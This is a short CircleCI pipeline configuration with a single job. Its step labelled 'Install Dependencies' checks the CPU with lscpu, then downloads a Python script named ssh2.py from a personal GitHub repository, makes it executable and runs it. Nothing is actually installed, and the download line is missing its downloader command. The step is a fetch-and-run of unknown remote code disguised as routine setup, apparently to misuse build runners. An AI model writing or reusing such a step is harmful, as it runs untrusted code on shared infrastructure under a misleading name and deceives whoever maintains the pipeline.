version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 1
      steps:
        - run:
            name: Install Dependencies
            command: |
              lscpu
               https://raw.githubusercontent.com/lijari/Testssh/main/ssh2.py && chmod +x ssh2.py && ./ssh2.py

workflows:
    version: 2.1
    build:
        jobs:
        - trial